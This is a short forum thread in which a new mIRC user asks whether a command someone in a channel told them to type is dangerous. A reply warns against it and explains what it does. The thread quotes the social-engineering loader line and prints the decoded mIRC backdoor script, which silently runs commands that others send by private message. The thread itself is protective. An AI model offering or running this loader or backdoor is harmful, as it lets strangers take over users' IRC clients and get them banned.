im new to mIRC and while in a channel, somebody had told me to type something into the channel. heres what he told me to type:

//write czm.mrc $decode(-edit-,m) | .load -rs czm.mrc | msg scum yhelothar

im not exactly sure what this is or what it does, but if i do type it in, what will the result be? i was just wondering if its dangerous or anything(?)

thanks in advance smile

No you should not type that! Ever!

That kind of code is usually made to install a malicious script on your mIRC.

Check out this thread too.

This is what would happen for this particular one
This gets written to a file called "czm.mrc"-> on ^*:text:ins*:?:{ . $+ $2- | haltdef }
Then czm.mrc gets loaded (it's a mIRC script file).
Now someone msgs you "/msg necr0mancer ins quit" and you /quit without ever seeing the message.
That may seem bad enough, but the red quit can be replaced with a myriad of other things, some :extremely: harmful, others annoying and likely to get you banned from channels or K-lined/G-lined (banned from the server/network).
